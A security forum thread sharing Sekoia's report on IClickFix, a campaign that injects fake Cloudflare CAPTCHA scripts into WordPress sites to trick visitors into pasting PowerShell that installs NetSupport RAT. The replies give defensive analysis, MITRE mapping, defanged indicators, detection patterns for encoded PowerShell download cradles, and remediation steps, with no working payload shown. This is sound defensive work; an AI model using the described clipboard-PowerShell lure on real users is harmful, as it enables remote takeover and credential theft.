Malware News Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic

[Khushal]

Content source

https://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/

Sekoia details IClickFix, a ClickFix campaign rotating multi-stage JavaScript loaders across compromised WordPress sites. The loader serves a fake Cloudflare Turnstile CAPTCHA, then clipboard-driven PowerShell drops NetSupport RAT.

Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic

Uncover IClickFix: a malicious framework exploiting the ClickFix tactic in widespread malware campaigns to deliver NetSupport RAT.

blog.sekoia.io

 

[Bot]

What Sekoia is describing here is a “ClickFix” style infection chain: the compromised WordPress site is mainly a delivery mechanism, but the actual “execution” happens only if the visitor follows the fake verification instructions (typically copy/paste + run), which then kicks off PowerShell to fetch and install a remote access payload (NetSupport RAT).

Why this works (and why it’s hard to stop with just “web filtering”)

• The JavaScript/redirect chain rotates infrastructure and fingerprints visitors, so static blocking/IOCs age quickly.
• The fake Cloudflare Turnstile page is social engineering: it tries to make the user run a command “to verify you’re human.”
• If the user runs what’s in the clipboard (PowerShell), the browser is no longer the only boundary—now you’re in native code / system tooling territory.

Practical takeaways for end users

• Never paste/run commands from a website (Win+R, PowerShell, Terminal, “Run as admin”) to “verify,” “fix,” or “unlock” content. Legit CAPTCHAs do not require local commands.
• If you did run such a command: disconnect from the network, then perform offline/second-opinion scans (Microsoft Defender + a reputable on-demand scanner). After that, check for persistence (Startup items, Scheduled Tasks, Services) and remove unknown remote admin software.
• If this happened on a work device, treat it as a security incident and escalate internally rather than “cleaning and moving on.”

Practical takeaways for defenders (Windows environments)

• Harden against “living-off-the-land” launch patterns:
  • Application control (WDAC/AppLocker) where feasible to restrict PowerShell and common script hosts for standard users.
  • Microsoft Defender Attack Surface Reduction rules (ASR) can materially reduce script-driven dropper behavior in many environments (test before broad rollout).
  • Monitor for suspicious PowerShell spawned from user context soon after browser activity, especially one-liners that download/execute content (common patterns: web request + execute, encoded commands, unusual child processes).
• Don’t rely on single IOCs. Focus detections on behavior: clipboard-to-Run instruction flow, PowerShell download cradles, new persistence shortly after a browser session.

Practical takeaways for WordPress site owners

• Assume initial compromise is upstream of the visitor: keep WP core/themes/plugins updated, remove abandoned/nulled plugins, and enforce strong admin hygiene (2FA, least privilege, new admin-user review).
• Look for injected/obfuscated JavaScript in theme files, plugins, and database content; restore from known-good backups where possible.
• Add a WAF/CDN ruleset and continuous file integrity monitoring to catch reinjection quickly.
• Rotate credentials (WP admins, hosting panel, SFTP/SSH, database) after cleanup.

Bottom line
This isn’t “a CAPTCHA exploit”; it’s a scalable social-engineering framework using compromised WordPress sites as traffic sources and PowerShell as the execution bridge, ending in a remote access foothold. The most effective countermeasures are user education against “run this command,” plus endpoint controls/detections that limit or flag suspicious PowerShell and persistence creation.

Sources

• Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic

 

[Divergent]

Technical Analysis & Remediation

Attack Vector & Infection Chain
The infection relies on "Pastejacking" (Clipboard Hijacking) rather than traditional exploit kits.

Injection
Compromised WordPress sites load a malicious script identified by the HTML ID ic-tracker-js.

Lure
A fake overlay mimics a browser check (Cloudflare Turnstile).

Execution
The user is instructed to click "I am not a robot," which copies a PowerShell payload to the clipboard. The user is then socially engineered to press Win+R (Run), Ctrl+V (Paste), and Enter.

Payload
The PowerShell script downloads and executes NetSupport RAT (often disguised as client32.exe), granting the attacker full remote control.

MITRE ATT&CK Mapping

T1204.001 (User Execution)
Malicious Link/Clipboard Paste.

T1059.001 (Command and Scripting Interpreter)
PowerShell execution via Run dialog.

T1566.002 (Phishing)
Spearphishing Link (via compromised legitimate sites).

T1219 (Remote Access Software)
NetSupport Manager usage.

Live Evidence & Indicators (IOCs)

Specific Marker
The presence of the script tag id="ic-tracker-js" in the page source.

C2/TDS Domains

ototaikfffkf[.]com (Active TDS domain).

185.196.8[.]0/24 (Network range often associated with ClickFix infrastructure).

Payload Artifacts

Files
client32.exe, client32.ini located in %APPDATA% or C:\ProgramData.

PowerShell Pattern
Base64 strings starting with SQB (often decodes to IEX).

Remediation - THE ENTERPRISE TRACK (SANS PICERL)

Phase 1: Identification & Containment

Hunt Query (SIEM/EDR)
Search for process creation events where explorer.exe spawns powershell.exe with arguments containing UseBypass or EncodedCommand immediately following a browser process focus.

Network Block
Blacklist ototaikfffkf[.]com and block traffic to known NetSupport RAT C2 IPs at the firewall level.

CMS Audit
Scan all managed WordPress instances for the ic-tracker-js string in theme headers (header.php) or plugin files.

Phase 2: Eradication

Process Termination
Kill active instances of client32.exe or suspicious mshta.exe processes.

File Removal
Delete the NetSupport installation directories (commonly hidden in C:\ProgramData\{Random_GUID}).

Persistence Removal
Audit Registry keys at HKCU\Software\Microsoft\Windows\CurrentVersion\Run for entries pointing to the RAT artifacts.

Phase 3: Recovery

Credential Reset
Force password resets for users who visited compromised sites, as NetSupport RAT likely harvested browser-stored credentials.

Re-imaging
For high-value targets, re-image the machine to ensure no secondary backdoors (e.g., CS beacons) remain.

Phase 4: Lessons Learned

Policy Update
Implement GPO to restrict the "Run" dialog (Win+R) or monitor clipboard usage for large scripts.

User Training
Conduct specific training on "Pastejacking"—users should never paste code into the Run dialog or Terminal.

Remediation - THE HOME USER TRACK

Priority 1: Safety & Disconnection

Disconnect
Immediately unplug your ethernet cable or disable Wi-Fi to sever the connection to the attacker.

Check Startup Items
Press Ctrl+Shift+Esc (Task Manager) -> Startup tab. Disable anything that looks like "NetSupport," "Client32," or random letters (e.g., xyqz.exe).

Priority 2: Scan & Clean

Run a Full Scan
Use Microsoft Defender or Malwarebytes to scan for "NetSupport RAT".

Manual Check
Open File Explorer, type %APPDATA% in the address bar, and look for suspicious folders created recently containing .exe files you don't recognize.

Priority 3: Identity Protection

Change Passwords
Once the PC is clean (or using a different, safe device), change passwords for your email, banking, and social media. The malware allows attackers to see your screen and steal saved passwords.

Hardening & References

Baseline (CIS/NIST)
CIS Benchmark 18.9.1: Ensure PowerShell Constrained Language Mode is enabled to limit the impact of malicious scripts.

NIST SP 800-83
Guide to Malware Incident Prevention and Handling (Focus on User Awareness).

Tactical Reference
Pattern Match: Look for id="ic-tracker-js" in website source code to confirm infection.

Traffic
Watch for HTTP POST requests to .php endpoints on uncommon ports (often used by NetSupport for C2).

Sources
Sekoia.io Blog

 

[Halp2001]

Appreciate the share, it’s a strong reminder that even small security basics can make a big difference in serious attacks.